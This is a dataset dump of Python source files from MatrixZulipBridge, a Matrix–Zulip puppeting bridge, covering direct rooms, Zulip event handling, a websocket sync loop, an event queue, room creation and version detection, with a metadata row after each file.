# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
"""Pupetting Matrix - Zulip bridge"""
from matrixzulipbridge.version import __version__
| 1,085 | Python | .py | 25 | 42.4 | 95 | 0.785849 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,584 | direct_room.py | GearKite_MatrixZulipBridge/matrixzulipbridge/direct_room.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import asyncio
import logging
from typing import TYPE_CHECKING, Optional
from bidict import bidict
from mautrix.types import MessageType
from zulip_emoji_mapping import EmojiNotFoundException, ZulipEmojiMapping
from matrixzulipbridge.command_parse import (
CommandManager,
CommandParser,
CommandParserError,
)
from matrixzulipbridge.room import InvalidConfigError
from matrixzulipbridge.under_organization_room import UnderOrganizationRoom, connected
if TYPE_CHECKING:
import zulip
from mautrix.types import (
EventID,
MessageEvent,
ReactionEvent,
RedactionEvent,
UserID,
)
from matrixzulipbridge.organization_room import OrganizationRoom
from matrixzulipbridge.types import ZulipMessageID, ZulipUserID
class DirectRoom(UnderOrganizationRoom):
name: str
media: list[list[str]]
recipient_ids: list["ZulipUserID"]
max_backfill_amount: int
lazy_members: dict
messages: bidict["ZulipMessageID", "EventID"]
reactions: bidict["EventID", frozenset]
commands: CommandManager
def init(self) -> None:
super().init()
self.name = None
self.media = []
self.recipient_ids = []
self.max_backfill_amount = None
self.messages = bidict()
self.reactions = bidict()
self.commands = CommandManager()
cmd = CommandParser(
prog="BACKFILL",
description="set the maximum amount of backfilled messages (0 to disable backfilling)",
)
cmd.add_argument("amount", nargs="?", help="new amount")
cmd.add_argument("--now", action="store_true", help="start backfilling now")
self.commands.register(cmd, self.cmd_backfill)
self.mx_register("m.room.message", self.on_mx_message)
self.mx_register("m.room.redaction", self.on_mx_redaction)
self.mx_register("m.reaction", self.on_mx_reaction)
def from_config(self, config: dict) -> None:
super().from_config(config)
if "name" not in config:
raise InvalidConfigError("No name key in config for ChatRoom")
self.name = config["name"]
if "media" in config:
self.media = config["media"]
if "max_backfill_amount" in config:
self.max_backfill_amount = config["max_backfill_amount"]
if "recipient_ids" in config:
self.recipient_ids = config["recipient_ids"]
if "messages" in config and config["messages"]:
self.messages = bidict(config["messages"])
if "reactions" in config and config["reactions"]:
self.reactions = bidict(
{
k: frozenset({l[0]: l[1] for l in v}.items())
for k, v in config["reactions"].items()
}
)
def to_config(self) -> dict:
return {
**(super().to_config()),
"name": self.name,
"organization_id": self.organization_id,
"media": self.media[:5],
"max_backfill_amount": self.max_backfill_amount,
"recipient_ids": self.recipient_ids,
"messages": dict(self.messages),
"reactions": {k: list(v) for k, v in self.reactions.items()},
}
@staticmethod
async def create(
organization: "OrganizationRoom",
zulip_recipients: dict,
) -> "DirectRoom":
logging.debug(
f"DirectRoom.create(organization='{organization.name}', recipients='{zulip_recipients}'"
)
mx_recipients = []
for user in zulip_recipients:
if str(user["id"]) in organization.zulip_puppet_user_mxid:
mxid = organization.zulip_puppet_user_mxid[str(user["id"])]
else:
mxid = organization.serv.get_mxid_from_zulip_user_id(
organization, user["id"]
)
if "full_name" in user:
await organization.serv.cache_user(mxid, user["full_name"])
mx_recipients.append(mxid)
room = DirectRoom(
None,
organization.user_id,
organization.serv,
mx_recipients,
[],
)
room.name = ", ".join([user["full_name"] for user in zulip_recipients])
room.organization = organization
room.organization_id = organization.id
room.max_backfill_amount = organization.max_backfill_amount
room.recipient_ids = [user["id"] for user in zulip_recipients]
organization.serv.register_room(room)
recipient_ids = frozenset(room.recipient_ids)
organization.direct_rooms[recipient_ids] = room
asyncio.ensure_future(room.create_mx(mx_recipients))
return room
async def create_mx(self, user_mxids: list["UserID"]) -> None:
if self.id is None:
self.id = await self.organization.serv.create_room(
f"{self.name} ({self.organization.name})",
f"Direct messages with {self.name} from {self.organization.name}",
user_mxids,
is_direct=True,
)
self.serv.register_room(self)
for user_mxid in user_mxids:
if self.serv.is_puppet(user_mxid):
await self.az.intent.user(user_mxid).ensure_joined(self.id)
await self.save()
# start event queue now that we have an id
self._queue.start()
# attach to organization space
if self.organization.space:
await self.organization.space.attach(self.id)
def is_valid(self) -> bool:
if self.organization_id is None:
return False
if self.name is None:
return False
if len(self.recipient_ids) == 0:
return False
return True
def cleanup(self) -> None:
logging.debug(f"Cleaning up organization connected room {self.id}.")
# cleanup us from organization space if we have it
if self.organization and self.organization.space:
asyncio.ensure_future(self.organization.space.detach(self.id))
# cleanup us from organization rooms
if self.organization and self.name in self.organization.rooms:
logging.debug(
f"... and we are attached to organization {self.organization.id}, detaching."
)
del self.organization.rooms[self.name]
super().cleanup()
def send_notice(
self,
text: str,
user_id: Optional["UserID"] = None,
formatted=None,
fallback_html: Optional[str] = None,
forward=False,
):
if (self.force_forward or forward) and user_id is None:
self.organization.send_notice(
text=f"{self.name}: {text}",
formatted=formatted,
fallback_html=fallback_html,
)
else:
super().send_notice(
text=text,
user_id=user_id,
formatted=formatted,
fallback_html=fallback_html,
)
def send_notice_html(
self, text: str, user_id: Optional["UserID"] = None, forward=False
) -> None:
if (self.force_forward or forward) and user_id is None:
self.organization.send_notice_html(text=f"{self.name}: {text}")
else:
super().send_notice_html(text=text, user_id=user_id)
@connected
async def on_mx_message(self, event: "MessageEvent") -> None:
await self.check_if_nobody_left()
sender = str(event.sender)
(name, server) = sender.split(":", 1)
# ignore self messages
if sender == self.serv.user_id:
return
# prevent re-sending federated messages back
if (
name.startswith("@" + self.serv.puppet_prefix)
and server == self.serv.server_name
):
return
if event.content.msgtype.is_media or event.content.msgtype in (
MessageType.EMOTE,
MessageType.TEXT,
MessageType.NOTICE,
):
await self._relay_message(event)
await self.az.intent.send_receipt(event.room_id, event.event_id)
@connected
async def on_mx_redaction(self, event: "RedactionEvent"):
event_id = event.redacts
client = self.organization.zulip_puppets.get(event.sender)
if event_id in self.messages.inverse:
zulip_message_id = self.messages.inverse[event_id]
result = client.delete_message(zulip_message_id)
del self.messages.inverse[event_id]
elif event_id in self.reactions:
reaction = {i[0]: i[1] for i in self.reactions[event_id]}
request = {
"message_id": reaction["message_id"],
"emoji_name": reaction["emoji_name"],
}
result = client.remove_reaction(request)
zulip_user_id = self.organization.zulip_puppet_user_mxid.inverse[
event.sender
]
request["user_id"] = str(zulip_user_id)
frozen_request = frozenset(request.items())
del self.reactions.inverse[frozen_request]
else:
return
if result["result"] != "success":
logging.debug(f"Couldn't redact event on Zulip: {result['msg']}")
@connected
async def on_mx_reaction(self, event: "ReactionEvent"):
client = self.organization.zulip_puppets.get(event.sender)
# This only works for logged in users
if not client:
return
if event.content.relates_to.rel_type.value != "m.annotation":
return
zulip_user_id = self.organization.zulip_puppet_user_mxid.inverse[event.sender]
reaction = event.content.relates_to.key
try:
emoji_name = ZulipEmojiMapping.get_emoji_name(reaction)
except EmojiNotFoundException:
emoji_name = reaction
event_id = event.content.relates_to.event_id
zulip_message_id = self.messages.inverse.get(event_id)
if not zulip_message_id:
logging.error(
f"Could not find a message to react to for {event_id}. Was it sent to Zulip?"
)
return
request = {
"message_id": zulip_message_id,
"emoji_name": emoji_name,
}
result = client.add_reaction(request)
if result["result"] != "success":
logging.debug(f"Failed adding reaction {emoji_name} to {zulip_message_id}!")
return
request["user_id"] = str(zulip_user_id)
frozen_request = frozenset(request.items())
if frozen_request in self.reactions.inverse:
del self.reactions.inverse[frozen_request]
self.reactions[event.event_id] = frozen_request
async def _relay_message(self, event: "MessageEvent"):
prefix = ""
client = self.organization.zulip_puppets.get(event.sender)
if not client:
logging.error(
f"Matrix user ({event.sender}) sent a DM without having logged in to Zulip"
)
return
# try to find out if this was a reply
reply_to = None
if event.content.get_reply_to():
rel_event = event
# traverse back all edits
while rel_event.content.get_edit():
rel_event = await self.az.intent.get_event(
self.id, rel_event.content.get_edit()
)
# see if the original is a reply
if rel_event.content.get_reply_to():
reply_to = await self.az.intent.get_event(
self.id, rel_event.content.get_reply_to()
)
# keep track of the last message
self.last_messages[event.sender] = event
message = await self._process_event_content(event, prefix, reply_to)
request = {
"type": "private",
"to": self.recipient_ids,
"content": message,
}
result = client.send_message(request)
if result["result"] != "success":
logging.error(f"Failed sending message to Zulip: {result['msg']}")
return
self.messages[str(result["id"])] = event.event_id
await self.organization.save()
await self.save()
async def _flush_event(self, event: dict):
if event["type"] == "_zulip_react":
intent = self.az.intent.user(event["user_id"])
message_event_id = event["event_id"]
request = {
"message_id": event["zulip_message_id"],
"emoji_name": event["zulip_emoji_name"],
"user_id": event["zulip_user_id"],
}
frozen_request = frozenset(request.items())
# Check if this reaction has already been relayed
if self.reactions.inverse.get(frozen_request) is not None:
return
event_id = await intent.react(self.id, message_event_id, event["key"])
self.reactions[event_id] = frozen_request
await self.save()
else:
await super()._flush_event(event)
def relay_zulip_react(
self,
user_id: "UserID",
event_id: "EventID",
key: str,
zulip_message_id: "ZulipMessageID",
zulip_emoji_name: str,
zulip_user_id: "ZulipUserID",
):
self._queue.enqueue(
{
"type": "_zulip_react",
"user_id": user_id,
"event_id": event_id,
"key": key,
"zulip_message_id": zulip_message_id,
"zulip_emoji_name": zulip_emoji_name,
"zulip_user_id": zulip_user_id,
}
)
async def check_if_nobody_left(self):
"""Invite back everyone who left"""
mx_recipients = []
for user_id in self.recipient_ids:
if str(user_id) not in self.organization.zulip_puppet_user_mxid:
continue
mx_recipients.append(self.organization.zulip_puppet_user_mxid[str(user_id)])
for mxid in mx_recipients:
if mxid in self.members:
continue
await self.az.intent.invite_user(self.id, mxid)
async def cmd_backfill(self, args) -> None:
if args.amount:
self.max_backfill_amount = int(args.amount)
await self.save()
self.send_notice(
f"Maximum backfill amount is set to: {self.max_backfill_amount}"
)
if args.now:
await self.backfill_messages()
async def cmd_upgrade(self, args) -> None:
if not args.undo:
await self._attach_space()
async def backfill_messages(self):
if not self.organization.max_backfill_amount:
return
request = {
"anchor": "newest",
"num_before": self.organization.max_backfill_amount,
"num_after": 0,
"narrow": [
{"operator": "dm", "operand": self.recipient_ids},
],
}
client = self.get_any_zulip_client()
if client is None:
return
result = client.get_messages(request)
if result["result"] != "success":
logging.error(f"Failed getting Zulip messages: {result['msg']}")
return
for message in result["messages"]:
if str(message["id"]) in self.messages:
continue
if str(message["id"]) in self.organization.messages:
continue
self.organization.dm_message(message)
def get_any_zulip_client(self) -> "zulip.Client":
for recipient_id in self.recipient_ids:
mxid = self.organization.zulip_puppet_user_mxid.get(str(recipient_id))
if not mxid:
continue
client = self.organization.zulip_puppets.get(mxid)
if client is None:
continue
return client
return None
| 17,173 | Python | .py | 420 | 30.4 | 100 | 0.595572 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,585 | websocket.py | GearKite_MatrixZulipBridge/matrixzulipbridge/websocket.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import asyncio
import json
import logging
import aiohttp
from mautrix.types.event import Event
class AppserviceWebsocket:
def __init__(self, url, token, callback):
self.url = url + "/_matrix/client/unstable/fi.mau.as_sync"
self.headers = {
"Authorization": f"Bearer {token}",
"X-Mautrix-Websocket-Version": "3",
}
self.callback = callback
async def start(self):
asyncio.create_task(self._loop())
async def _loop(self):
while True:
try:
logging.info(f"Connecting to {self.url}...")
async with aiohttp.ClientSession(headers=self.headers) as sess:
async with sess.ws_connect(self.url) as ws:
logging.info("Websocket connected.")
async for msg in ws:
if msg.type != aiohttp.WSMsgType.TEXT:
logging.debug("Unhandled WS message: %s", msg)
continue
data = msg.json()
if (
data["status"] == "ok"
and data["command"] == "transaction"
):
logging.debug(f"Websocket transaction {data['txn_id']}")
for event in data["events"]:
try:
await self.callback(Event.deserialize(event))
except Exception as e:
logging.error(e)
await ws.send_str(
json.dumps(
{
"command": "response",
"id": data["id"],
"data": {},
}
)
)
else:
logging.warn("Unhandled WS command: %s", data)
logging.info("Websocket disconnected.")
except asyncio.CancelledError:
logging.info("Websocket was cancelled.")
return
except Exception as e:
logging.error(e)
try:
await asyncio.sleep(5)
except asyncio.CancelledError:
return
| 3,603 | Python | .py | 81 | 28.283951 | 95 | 0.505839 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,586 | zulip.py | GearKite_MatrixZulipBridge/matrixzulipbridge/zulip.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import logging
import re
from typing import TYPE_CHECKING, Optional
from urllib.parse import urljoin
import emoji
from bs4 import BeautifulSoup
from markdownify import markdownify
from zulip_emoji_mapping import EmojiNotFoundException, ZulipEmojiMapping
from matrixzulipbridge.direct_room import DirectRoom
from matrixzulipbridge.stream_room import StreamRoom
from matrixzulipbridge.types import ZulipUserID
if TYPE_CHECKING:
from matrixzulipbridge.organization_room import OrganizationRoom
from matrixzulipbridge.types import ZulipMessageID, ZulipStreamID
class ZulipEventHandler:
def __init__(self, organization: "OrganizationRoom") -> None:
self.organization = organization
self.messages = set()
def on_event(self, event: dict):
logging.debug(f"Zulip event for {self.organization.name}: {event}")
try:
match event["type"]:
case "message":
self._handle_message(event["message"])
case "subscription":
self._handle_subscription(event)
case "reaction":
self._handle_reaction(event)
case "delete_message":
self._handle_delete_message(event)
case "realm_user":
self._handle_realm_user(event)
case "update_message":
self._handle_update_message(event)
case _:
logging.debug(f"Unhandled event type: {event['type']}")
except Exception as e: # pylint: disable=broad-exception-caught
logging.exception(e)
def backfill_message(self, message: dict):
self._handle_message(message)
def _handle_message(self, event: dict):
if event["type"] != "stream":
return
if event["sender_id"] == self.organization.profile["user_id"]:
return # Ignore own messages
# Prevent race condition when single message is received by multiple clients
if str(event["id"]) in self.messages:
return
self.messages.add(str(event["id"]))
room = self._get_room_by_stream_id(event["stream_id"])
if not room:
logging.debug(
f"Received message from stream with no associated Matrix room: {event}"
)
return
# Skip already forwarded messages
if str(event["id"]) in room.messages:
return
topic = event["subject"]
mx_user_id = room.serv.get_mxid_from_zulip_user_id(
self.organization, event["sender_id"]
)
message, formatted_message, reply_event_id = self._process_message_content(
event["content"], room
)
custom_data = {
"zulip_topic": topic,
"zulip_user_id": event["sender_id"],
"display_name": event["sender_full_name"],
"zulip_message_id": event["id"],
"type": "message",
"timestamp": event["timestamp"],
"target": "stream",
"reply_to": reply_event_id,
}
room.send_message(
message,
formatted=formatted_message,
user_id=mx_user_id,
custom_data=custom_data,
)
async def handle_dm_message(self, event: dict):
if event["sender_id"] == self.organization.profile["user_id"]:
return # Ignore own messages
# Prevent race condition when single message is received by multiple clients
if str(event["id"]) in self.messages:
return
mx_user_id = self.organization.serv.get_mxid_from_zulip_user_id(
self.organization, event["sender_id"]
)
recipient_ids = frozenset(user["id"] for user in event["display_recipient"])
room = self.organization.direct_rooms.get(recipient_ids)
if not room:
room = await DirectRoom.create(
self.organization, event["display_recipient"]
)
# Skip already forwarded messages
if str(event["id"]) in room.messages:
return
message, formatted_message, reply_event_id = self._process_message_content(
event["content"], room
)
custom_data = {
"zulip_user_id": event["sender_id"],
"display_name": event["sender_full_name"],
"zulip_message_id": event["id"],
"type": "message",
"timestamp": event["timestamp"],
"target": "direct",
"reply_to": reply_event_id,
}
room.send_message(
message,
formatted=formatted_message,
user_id=mx_user_id,
custom_data=custom_data,
)
def _handle_reaction(self, event: dict):
zulip_message_id = str(event["message_id"])
room = self._get_room_by_message_id(zulip_message_id)
if not room:
logging.debug(f"Couldn't find room for reaction: {event}")
return
mx_user_id = room.serv.get_mxid_from_zulip_user_id(
self.organization, event["user_id"]
)
try:
reaction = ZulipEmojiMapping.get_emoji_by_name(event["emoji_name"])
except EmojiNotFoundException:
reaction = event["emoji_name"]
if event["op"] == "add":
message_event_id = room.messages[zulip_message_id]
room.relay_zulip_react(
user_id=mx_user_id,
event_id=message_event_id,
key=reaction,
zulip_message_id=zulip_message_id,
zulip_emoji_name=event["emoji_name"],
zulip_user_id=ZulipUserID(event["user_id"]),
)
elif event["op"] == "remove":
request = {
"message_id": zulip_message_id,
"emoji_name": event["emoji_name"],
"user_id": ZulipUserID(event["user_id"]),
}
frozen_request = frozenset(request.items())
event_id = room.reactions.inverse.get(frozen_request)
if event_id is None:
return
room.redact(event_id, "removed on Zulip")
del room.reactions[event_id]
def _handle_delete_message(self, event: dict):
room = self._get_room_by_stream_id(event["stream_id"])
message_mxid = self._get_mxid_from_zulip_id(event["message_id"], room)
if not message_mxid:
return
room.redact(message_mxid, reason="Deleted on Zulip")
del room.messages[str(event["message_id"])]
def _handle_subscription(self, event: dict):
if not "stream_ids" in event:
return
for stream_id in event["stream_ids"]:
room = self._get_room_by_stream_id(stream_id)
if not room:
logging.debug(
f"Received message from stream with no associated Matrix room: {event}"
)
return
match event["op"]:
case "peer_add":
for user_id in event["user_ids"]:
room.on_join(user_id)
case "peer_remove":
for user_id in event["user_ids"]:
room.on_part(user_id)
def _handle_realm_user(self, event: dict):
# Update Zulip user cache
if event["op"] == "update":
user_id = event["person"]["user_id"]
if not user_id in self.organization.zulip_users:
return
self.organization.zulip_users[user_id] |= event["person"]
def _handle_update_message(self, event: dict):
if "orig_subject" in event:
# Message topic renamed
stream_id = event.get("stream_id")
if stream_id is None:
return
room = self._get_room_by_stream_id(stream_id)
if event["propagate_mode"] == "change_all":
thread_event_id = room.threads.get(event["orig_subject"])
if thread_event_id is None:
return
del room.threads[event["orig_subject"]]
room.threads[event["subject"]] = thread_event_id
def _get_mxid_from_zulip_id(
self, zulip_id: "ZulipMessageID", room: DirectRoom = None
):
if room is not None:
return room.messages.get(str(zulip_id))
for room in self.organization.rooms.values():
if not isinstance(room, DirectRoom):
continue
mxid = room.messages.get(str(zulip_id))
if mxid is not None:
return mxid
logging.debug(
f"Message with Zulip ID {zulip_id} not found, it probably wasn't sent to Matrix"
)
def _get_room_by_stream_id(
self, stream_id: "ZulipStreamID"
) -> Optional["StreamRoom"]:
for room in self.organization.rooms.values():
if not isinstance(room, StreamRoom):
continue
if room.stream_id == stream_id:
return room
return None
def _get_room_by_message_id(
self, message_id: "ZulipMessageID"
) -> Optional["DirectRoom"]:
for room in self.organization.rooms.values():
if not isinstance(room, DirectRoom):
continue
if message_id in room.messages:
return room
return None
def _process_message_content(self, html: str, room: "DirectRoom"):
reply_event_id = None
# Replace Zulip file upload relative URLs with absolute
soup = BeautifulSoup(html, "html.parser")
for a_tag in soup.find_all("a"):
href = a_tag.get("href")
absolute_url = urljoin(self.organization.server["realm_uri"], href)
a_tag["href"] = absolute_url
# Check if message contains a reply
first_text = soup.find("p")
mentioned_user = first_text.select("span.user-mention.silent")
narrow_link = first_text.find("a")
quote = soup.find("blockquote")
if (
len(mentioned_user) == 1
and narrow_link is not None
and narrow_link.get("href") is not None
and quote is not None
and "#narrow" in narrow_link.get("href", "")
):
# Parse reply (crudely?)
message_id = re.match(r".*\/near\/(\d+)(\/|$)", narrow_link.get("href"))[1]
reply_event_id = room.messages.get(message_id)
# Create rich reply fallback
if reply_event_id is not None:
mentioned_zulip_id = mentioned_user[0]["data-user-id"]
mentioned_user_mxid = self.organization.zulip_puppet_user_mxid.get(
mentioned_zulip_id
)
if mentioned_user_mxid is None:
mentioned_user_mxid = (
self.organization.serv.get_mxid_from_zulip_user_id(
self.organization, mentioned_zulip_id
)
)
quote.extract()
# Fromat reply
mx_reply = soup.new_tag("mx-reply")
mx_reply_quote = soup.new_tag("blockquote")
mx_reply_event = soup.new_tag(
"a",
href=f"https://matrix.to/#/{room.id}/{reply_event_id}",
)
mx_reply_event.append(soup.new_string("In reply to"))
mx_reply_author = soup.new_tag(
"a", href=f"https://matrix.to/#/{mentioned_user_mxid}"
)
mx_reply_author.append(soup.new_string(mentioned_user_mxid))
mx_reply_quote.append(mx_reply_event)
mx_reply_quote.append(mx_reply_author)
mx_reply_quote.append(soup.new_tag("br"))
for child in quote.findChildren():
mx_reply_quote.append(child)
mx_reply.append(mx_reply_quote)
first_text.replace_with(mx_reply)
formatted_message = emoji.emojize(soup.decode(), language="alias")
message = markdownify(formatted_message).rstrip()
return message, formatted_message, reply_event_id
| 13,320 | Python | .py | 309 | 31.508091 | 95 | 0.578188 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,587 | event_queue.py | GearKite_MatrixZulipBridge/matrixzulipbridge/event_queue.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import asyncio
import logging
class EventQueue:
def __init__(self, callback):
self._callback = callback
self._events = []
self._loop = asyncio.get_running_loop()
self._timer = None
self._start = 0
self._chain = asyncio.Queue()
self._task = None
self._timeout = 3600
def start(self):
if self._task is None:
self._task = asyncio.ensure_future(self._run())
def stop(self):
if self._task:
self._task.cancel()
self._task = None
async def _run(self):
while True:
try:
task = await self._chain.get()
except asyncio.CancelledError:
logging.debug("EventQueue was cancelled.")
return
try:
await asyncio.create_task(task)
except asyncio.CancelledError:
logging.debug("EventQueue task was cancelled.")
return
except asyncio.TimeoutError:
logging.warning("EventQueue task timed out.")
finally:
self._chain.task_done()
def _flush(self):
events = self._events
self._timer = None
self._events = []
self._chain.put_nowait(self._callback(events))
def enqueue(self, event):
now = self._loop.time()
# always cancel timer when we enqueue
if self._timer:
self._timer.cancel()
# stamp start time when we queue first event, always append event
if len(self._events) == 0:
self._start = now
self._events.append(event)
# if we have bumped ourself for half a second, flush now
if now >= self._start + 0.5:
self._flush()
else:
self._timer = self._loop.call_later(0.1, self._flush)
| 2,863 | Python | .py | 77 | 29.506494 | 95 | 0.632035 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,588 | appservice.py | GearKite_MatrixZulipBridge/matrixzulipbridge/appservice.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import logging
from abc import ABC, abstractmethod
from typing import TYPE_CHECKING
from mautrix.api import Method, Path
from mautrix.errors import MNotFound
if TYPE_CHECKING:
from mautrix.appservice import AppService as MauService
from mautrix.types import RoomID, UserID
from matrixzulipbridge.room import Room
class AppService(ABC):
az: "MauService"
user_id: "UserID"
server_name: str
config: dict
async def load(self):
try:
self.config.update(await self.az.intent.get_account_data("zulip"))
except MNotFound:
await self.save()
async def save(self):
await self.az.intent.set_account_data("zulip", self.config)
async def create_room(
self,
name: str,
topic: str,
invite: list["UserID"],
restricted: str = None,
permissions: dict = None,
is_direct: bool = False,
) -> "RoomID":
if permissions is None:
permissions = {}
req = {
"visibility": "private",
"name": name,
"topic": topic,
"invite": invite,
"is_direct": is_direct,
"power_level_content_override": {
"users_default": 0,
"invite": 50,
"kick": 50,
"redact": 50,
"ban": 50,
"events": {
"m.room.name": 0,
"m.room.avatar": 0, # these work as long as rooms are private
"m.room.encryption": 100,
"m.space.parent": 90,
},
"users": {self.user_id: 100} | permissions,
},
"com.beeper.auto_join_invites": True,
}
if restricted is not None:
resp = await self.az.intent.api.request(Method.GET, Path.v3.capabilities)
try:
def_ver = resp["capabilities"]["m.room_versions"]["default"]
except KeyError:
logging.debug("Unexpected capabilities reply")
def_ver = None
# If room version is in range of 1..8, request v9
if def_ver in [str(v) for v in range(1, 9)]:
req["room_version"] = "9"
req["initial_state"] = [
{
"type": "m.room.join_rules",
"state_key": "",
"content": {
"join_rule": "restricted",
"allow": [{"type": "m.room_membership", "room_id": restricted}],
},
}
]
resp = await self.az.intent.api.request(Method.POST, Path.v3.createRoom, req)
return resp["room_id"]
@abstractmethod
def register_room(self, room: "Room"):
pass
@abstractmethod
def find_rooms(self, rtype=None, user_id: "UserID" = None) -> list["Room"]:
pass
| 3,937 | Python | .py | 105 | 28.219048 | 95 | 0.58637 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,589 | version.py | GearKite_MatrixZulipBridge/matrixzulipbridge/version.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import os
import shutil
import subprocess
module_dir = os.path.dirname(__file__)
root_dir = module_dir + "/../"
__version__ = "0.0.0"
__git_version__ = None
if os.path.exists(module_dir + "/version.txt"):
__version__ = open(module_dir + "/version.txt", encoding="utf-8").read().strip()
if os.path.exists(root_dir + ".git") and shutil.which("git"):
try:
git_env = {
"PATH": os.environ["PATH"],
"HOME": os.environ["HOME"],
"LANG": "C",
"LC_ALL": "C",
}
git_bits = (
subprocess.check_output(
["git", "describe", "--tags"],
stderr=subprocess.DEVNULL,
cwd=root_dir,
env=git_env,
)
.strip()
.decode("ascii")
.split("-")
)
__git_version__ = git_bits[0][1:]
if len(git_bits) > 1:
__git_version__ += f".dev{git_bits[1]}"
if len(git_bits) > 2:
__git_version__ += f"+{git_bits[2]}"
# always override version with git version if we have a valid version number
__version__ = __git_version__
except (subprocess.SubprocessError, OSError):
pass
| 2,222 | Python | .py | 60 | 31.1 | 95 | 0.631383 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,590 | room.py | GearKite_MatrixZulipBridge/matrixzulipbridge/room.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
